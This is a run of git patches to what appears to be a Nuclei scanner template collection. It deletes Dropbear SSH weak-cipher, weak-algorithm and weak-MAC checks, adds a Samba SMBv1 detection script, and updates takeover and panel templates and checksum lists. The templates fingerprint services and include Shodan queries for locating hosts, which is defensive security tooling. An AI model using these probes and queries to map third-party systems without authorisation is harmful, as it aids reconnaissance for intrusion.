network/detection/dropbear-cbc-ciphers.yaml delete mode 100644 network/misconfig/dropbear-weakalgo.yaml delete mode 100644 network/misconfig/dropbear-weakmac.yaml diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml deleted file mode 100644 index c9ecc8114a..0000000000 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: dropbear-cbc-ciphers - -info: - name: Dropbear sshd CBC Mode Ciphers Detection - author: pussycat0x - severity: low - description: | - The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. - reference: | - https://www.tenable.com/plugins/nessus/70658 - remediation: | - Disable CBC Ciphers. - metadata: - max-request: 1 - shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,detect - -tcp: - - inputs: - - data: "\n" - - host: - - "{{Hostname}}" - port: 22 - - matchers: - - type: word - words: - - "cbc" - - "SSH-" - condition: and -# digest: 4a0a00473045022002fae16b256b4653ad2b98f85511cd26f00c12b388af06a773784c5a84485c17022100e96053936cf02101d8c3295bc5c5797df04c9fc0e666e5fda59f09208ff75826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml deleted file mode 100644 index d8034d65c1..0000000000 --- a/network/misconfig/dropbear-weakalgo.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: dropbear-weakalgo - -info: - name: Dropbear sshd Weak Key Exchange Algorithms Enabled - author: pussycat0x - severity: low - description: | - The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. - reference: | - https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled - remediation: | - Disable the weak algorithms. - metadata: - max-request: 1 - shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,misconfig - -tcp: - - inputs: - - data: "\n" - - host: - - "{{Hostname}}" - port: 22 - - matchers: - - type: word - words: - - "diffie-hellman-group-exchange-sha1" - - "diffie-hellman-group1-sha1" - condition: or -# digest: 4a0a00473045022100c67a648de03e7a12d40987111db58dbe3c171939915e2f6c252204426551ad18022008ace27d961d279e82a266d8528612dd10fda1a23346679b3063892ba540ef48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml deleted file mode 100644 index 56f4dcb786..0000000000 --- a/network/misconfig/dropbear-weakmac.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: dropbear-weakmac - -info: - name: Dropbear Weak MAC Algorithms Enabled - author: pussycat0x - severity: low - description: | - The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. - reference: | - https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled - remediation: | - Disable MD5 and 96-bit MAC algorithms. - metadata: - max-request: 1 - shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,misconfig - -tcp: - - inputs: - - data: "\n" - - host: - - "{{Hostname}}" - port: 22 - - matchers-condition: and - matchers: - - type: word - words: - - "hmac-md5" - - "hmac-sha1" - condition: or - - - type: word - words: - - "SSH-" -# digest: 4a0a0047304502201e312e2112fd02be44c3d23cd1171be0f3e848d31cb26cebf4fef752f3cd645a022100ec6214b3268a8c3179da31e03e230be9b84a0750e5ce1bf134e50d2dc5e9fe2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e776ef6baba52740ff3d115d7b5b844f576344df Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 21 May 2024 22:20:44 -0500 Subject: [PATCH 083/847] Update flexbe-takeover.yaml Original link was removed, replaced with archived version. --- http/takeovers/flexbe-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 8646850340..befd9427aa 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high description: Flexbe takeover was detected. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 + - https://web.archive.org/web/20211002185648/https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 - https://help.flexbe.com/domains/ metadata: max-request: 1 @@ -32,4 +32,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100815bad00e060131f9f67695b3e5746f6b5feb9ac156fc15500adb76f825f1c92022100a1e5408a0f54a721f143c3b7f44e004f98dbf784584a2c3d9fff0925a0c075ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100815bad00e060131f9f67695b3e5746f6b5feb9ac156fc15500adb76f825f1c92022100a1e5408a0f54a721f143c3b7f44e004f98dbf784584a2c3d9fff0925a0c075ad:922c64590222798bb761d5b6d8e72950 From a6b6472c7d7dab78d7f899c0923b1ef7f68d6ef3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 05:02:10 +0000 Subject: [PATCH 085/847] Auto Generated Templates Checksum [Wed May 22 05:02:10 UTC 2024] :robot: --- templates-checksum.txt | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9949d77343..8ad4042892 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8401,7 +8401,6 @@ network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb network/detection/detect-addpac-voip-gateway.yaml:a06e5be5c8af1fc7e79ed9011ba9c91403d1069f network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8da4 network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf -network/detection/dropbear-cbc-ciphers.yaml:4db2cb7ef6fafd8c140a8a864f45e9ea321a22fc network/detection/esmtp-detect.yaml:dee11038a25d263f8b3d0f06ad53fb2b84a44c2a network/detection/exim-detect.yaml:c9541f70a921c64575e67ed7c7e0a364a28c613e network/detection/expn-mail-detect.yaml:651740f7523e435b000d01e7a9103c90bf25d3f5 @@ -8489,8 +8488,6 @@ network/misconfig/apache-dubbo-unauth.yaml:622efcfac18e7a5b1ece09a1d8a34d857d6bc network/misconfig/apache-rocketmq-broker-unauth.yaml:f6421f83ae1682e3561d7492aa5140e80e8586a7 network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 -network/misconfig/dropbear-weakalgo.yaml:6c7daef01b97062533ba41e8c242ef9fc8a546bd -network/misconfig/dropbear-weakmac.yaml:afc50bf81ebe0d85bb0f2a2be9be8ae8df3fc7de network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 @@ -8533,7 +8530,7 @@ ssl/c2/quasar-rat-c2.yaml:c3bf40b6fd278294f273f10d6826f401cec3cb1f ssl/c2/shadowpad-c2.yaml:45b74e7a9adff29793a0efa5bfcf1afa3bcfeacd ssl/c2/sliver-c2.yaml:35ed94dbbde1615aee5d86a3ce75791cc5d4b631 ssl/c2/venomrat.yaml:deffc1efa16ee53701962b41e8cbcab9e106208d -ssl/deprecated-tls.yaml:a377f33545c47d31417e3ba1b59ebf63d2970d23 +ssl/deprecated-tls.yaml:83590258f2dd4d9712d03d77a2076a9ee66c37df ssl/detect-ssl-issuer.yaml:3483faacc9cc303cac30d6c844bbe0a47c1d2e39 ssl/expired-ssl.yaml:a0c32548eb093d043f77f77eb905ac69e5d0e5b0 ssl/insecure-cipher-suite-detect.yaml:33ff0bbe66e06d4a01b13e40512e2838c9cf7f13 @@ -8546,7 +8543,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ee4ac2afea6977c2f93528ea016164dc59d5f525 +templates-checksum.txt:fe63b711d1c7f1345676ab81b4d7c1477c29803e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7478937a50ed60a2a131c227dfdb67b5d9977042 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 22 May 2024 12:12:06 +0530 Subject: [PATCH 086/847] Update meilisearch-detect.yaml --- http/technologies/meilisearch-detect.yaml | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index e92e1c09cb..fd36779bbc 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -24,11 +24,5 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains(content_type, "application/json")' + - 'contains(body, "Meilisearch is running")' condition: and - - - type: word - part: body - encoding: hex - words: - - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" From 14069a7ec3c9f6111d76dbd68a47494737675e6f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 06:46:16 +0000 Subject: [PATCH 087/847] Auto Generated New Template Addition List [Wed May 22 06:46:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 372db2b34f..16ad1ac877 100644 --- a/.new-additions +++ b/.new-additions @@ -39,6 +39,7 @@ http/technologies/apache/apache-answer-detect.yaml http/technologies/boa-web-server.yaml http/technologies/craftercms-detect.yaml http/technologies/imgproxy-detect.yaml +http/technologies/meilisearch-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml From 62f62bda0076b8e71866ca3d8ac7a29751417f24 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 06:46:21 +0000 Subject: [PATCH 088/847] Auto Generated Templates Checksum [Wed May 22 06:46:21 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ad4042892..74d33e9f3b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6824,6 +6824,7 @@ http/technologies/maian-cart-detect.yaml:04535015f709d487931505967e5b18023229a19 http/technologies/mappproxy-detect.yaml:34f8715bb04d15e410646087f140852d5e67e6a4 http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 +http/technologies/meilisearch-detect.yaml:ea0eed8f2dea564317914a7c34f7bf1b77dea059 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 @@ -8543,7 +8544,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fe63b711d1c7f1345676ab81b4d7c1477c29803e +templates-checksum.txt:b5a0879341065078cca8089129c0afa0b34a7888 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6352edf7bfc56d46931950c9e9a7f33c9e16b557 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 06:47:06 +0000 Subject: [PATCH 089/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a86de8d1ef..c3cd819f41 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -44,6 +44,7 @@ on: - 'http/technologies/boa-web-server.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/imgproxy-detect.yaml' + - 'http/technologies/meilisearch-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' From 185252ac1bcf7e33aabb9532c441f3da5c4858d2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 06:48:06 +0000 Subject: [PATCH 090/847] Auto Template Signing [Wed May 22 06:48:06 UTC 2024] :robot: --- http/technologies/meilisearch-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index fd36779bbc..e5593da0b4 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -26,3 +26,4 @@ http: - 'status_code == 200' - 'contains(body, "Meilisearch is running")' condition: and +# digest: 4a0a00473045022100babc8ffda11e34e8975a3e213cfb32312927b85bd14d40abe1d6b551aa91f4fb022075789999bea0d5ec76b5432eb14265895e6d1ab536fc369f029715755ff4d853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0a32b0d3268bd9f86b9fab6a6f62dd26c9c28c24 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 22 May 2024 14:00:05 +0530 Subject: [PATCH 091/847] samba - detect JS Template --- javascript/detection/samba-detect.yaml | 41 ++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 javascript/detection/samba-detect.yaml diff --git a/javascript/detection/samba-detect.yaml b/javascript/detection/samba-detect.yaml new file mode 100644 index 0000000000..cc3803783f --- /dev/null +++ b/javascript/detection/samba-detect.yaml @@ -0,0 +1,41 @@ +id: samba-detect + +info: + name: Samba - Detection + author: pussycat0x + severity: info + description: | + Samba allows file and print sharing between computers running Microsoft Windows and computers running Unix. It is an implementation of dozens of services and a dozen protocols, including: NetBIOS over TCP/IP (NBT) SMB (known as CIFS in some versions) + metadata: + max-request: 1 + shodan-query: "port:445" + tags: js,network,samba,detect,linux + +javascript: + - code: | + let m = require("nuclei/smb"); + let c = new m.SMBClient(); + let response = c.ConnectSMBInfoMode(Host, Port); + + const conditionsMet = (response.SupportV1 === true && response.Version.VerString === "SMB 1.0"); + + if (conditionsMet) { + + if (response.NTLM === "") { + printedValue = "Samba detected"; + } else { + printedValue = response.NTLM; + } + } + else { + process.exit(1); + } + + args: + Host: "{{Host}}" + Port: 445 + + extractors: + - type: dsl + dsl: + - response \ No newline at end of file From 285ced48116eb6bf9f8b987f24560c90c7c80da1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 22 May 2024 14:02:07 +0530 Subject: [PATCH 092/847] Delete network/detection/smb-detect.yaml --- network/detection/smb-detect.yaml | 27 --------------------------- 1 file changed, 27 deletions(-) delete mode 100644 network/detection/smb-detect.yaml diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml deleted file mode 100644 index cf3c61f95e..0000000000 --- a/network/detection/smb-detect.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: smb-detect - -info: - name: SMB Detection - author: pussycat0x - severity: low - description: | - SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems. - metadata: - max-request: 1 - tags: network,windows,linux,smb,service,detect - -tcp: - - inputs: - - data: 00000031ff534d4272000000001845680000000000000000000000000000be2200000100000e00024e54204c4d20302e3132000200 - type: hex - - host: - - "{{Hostname}}" - port: 445 - - matchers: - - type: word - words: - - "SMBr" - - "NT LM" - condition: or From b5712e32b172f8304912b306f8ffd232c5a98e87 Mon Sep 17 00:00:00 2001 From: jmac774 <104130511+jmac774@users.noreply.github.com> Date: Wed, 22 May 2024 11:10:28 +0200 Subject: [PATCH 093/847] Update devexpress-detect.yaml description & reference --- http/technologies/devexpress-detect.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index 6714d9bbcc..deef82eabf 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -7,6 +7,10 @@ info: metadata: max-request: 1 shodan-query: html:"DXR.axd" + description: "Detect DevExpress based on existence of its HTTP handler for serving images, scripts and other resources to the client side" + reference: + - https://github.com/DevExpress/aspnet-security-bestpractices/blob/master/SecurityBestPractices.WebForms/README.md#53-information-exposure-through-source-code + - https://supportcenter.devexpress.com/ticket/details/q311748/dxr-axd-what-is-it-and-how-to-disable-it tags: devexpress,iis,microsoft,asp,tech http: From 170caa6aac6a144a3abc986187b7da1a5fc27dbd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:13:33 +0000 Subject: [PATCH 095/847] Auto Generated New Template Addition List [Wed May 22 09:13:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 16ad1ac877..dbd9859d6e 100644 --- a/.new-additions +++ b/.new-additions @@ -32,6 +32,7 @@ http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml +http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml From 44fd72b646e14ef5475173ad39c8ba383d78ffa5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:14:12 +0000 Subject: [PATCH 096/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c3cd819f41..122254169b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -37,6 +37,7 @@ on: - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' + - 'http/misconfiguration/installer/openfire-setup.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' From f00b1585d1ae24b5d5218af3163a7237927bac7d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:14:25 +0000 Subject: [PATCH 097/847] Auto Generated Templates Checksum [Wed May 22 09:14:25 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 74d33e9f3b..1837b6bd63 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5440,7 +5440,9 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa53 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d727f642283a21d8 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a +http/misconfiguration/installer/octoprint-installer.yaml:d5fdda436ae9b456dca704c3a61af9cf9cd1d64d http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 +http/misconfiguration/installer/openfire-setup.yaml:283f6cdfa7c96e723575f73af2769a7a89b60b22 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc @@ -6824,7 +6826,7 @@ http/technologies/maian-cart-detect.yaml:04535015f709d487931505967e5b18023229a19 http/technologies/mappproxy-detect.yaml:34f8715bb04d15e410646087f140852d5e67e6a4 http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 -http/technologies/meilisearch-detect.yaml:ea0eed8f2dea564317914a7c34f7bf1b77dea059 +http/technologies/meilisearch-detect.yaml:a6496077c0c1e7d4dea5346d51d2f0863e8c0fa7 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 @@ -8544,7 +8546,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b5a0879341065078cca8089129c0afa0b34a7888 +templates-checksum.txt:74149f9f7f71c7586617faaea3dd7af8b393811d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 10a7d03d00b8e7c77e78c613c96cbcbe5e3a89fe Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 22 May 2024 14:45:27 +0530 Subject: [PATCH 098/847] Update microfocus-admin-server.yaml --- http/exposed-panels/microfocus-admin-server.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index a3127e0a6b..3557a411ea 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -15,7 +15,7 @@ info: shodan-query: Micro Focus DSD vendor: microfocus verified: true - tags: panel,exposure,microfocus,admin + tags: panel,microfocus,detect,login http: - method: GET @@ -43,4 +43,4 @@ http: group: 1 regex: - '(?i)Micro\s+Focus\s+Open\s+Enterprise\s+Server\s+([A-Z0-9\s]+)' - - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' \ No newline at end of file + - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' From bd3a07b1b90c082acbcedd36d9aa0d9c04184496 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:15:32 +0000 Subject: [PATCH 099/847] Auto Template Signing [Wed May 22 09:15:32 UTC 2024] :robot: --- http/misconfiguration/installer/openfire-setup.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml index 95d42298c4..7faa03f883 100644 --- a/http/misconfiguration/installer/openfire-setup.yaml +++ b/http/misconfiguration/installer/openfire-setup.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 072dca5b5ebc7ee2c50717d08883c0f5e02ee197 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:15:53 +0000 Subject: [PATCH 100/847] Auto Generated New Template Addition List [Wed May 22 09:15:53 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index dbd9859d6e..994432f283 100644 --- a/.new-additions +++ b/.new-additions @@ -32,9 +32,11 @@ http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml +http/misconfiguration/installer/octoprint-installer.yaml http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml +http/misconfiguration/installer/xbackbone-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml http/technologies/boa-web-server.yaml From 7d942aae58e3d4ae4b34bb4909d1443e1a499c28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:16:03 +0000 Subject: [PATCH 101/847] Auto Generated Templates Checksum [Wed May 22 09:16:03 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1837b6bd63..6da2281537 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5495,6 +5495,7 @@ http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 +http/misconfiguration/installer/xbackbone-installer.yaml:30b17b879c64fc395e02e5ba500170c6b381672d http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed8559ed9438a1b9 http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a @@ -8546,7 +8547,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:74149f9f7f71c7586617faaea3dd7af8b393811d +templates-checksum.txt:edbf51a3019bb4b115206be60f9fc068771f1242 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From be26b91616e1502a50712eeb7c531c5b3f6ed081 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:16:40 +0000 Subject: [PATCH 102/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 122254169b..2546fae73c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -37,9 +37,11 @@ on: - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' + - 'http/misconfiguration/installer/octoprint-installer.yaml' - 'http/misconfiguration/installer/openfire-setup.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' + - 'http/misconfiguration/installer/xbackbone-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' - 'http/technologies/boa-web-server.yaml' From 1879b270e460198aa9a951f516cd34df3e1294fc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 22 May 2024 14:47:11 +0530 Subject: [PATCH 103/847] updated format --- http/technologies/devexpress-detect.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index deef82eabf..7ad3dcfc73 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -1,16 +1,17 @@ id: devexpress-detect info: - name: DevExpress Detect + name: DevExpress - Detect 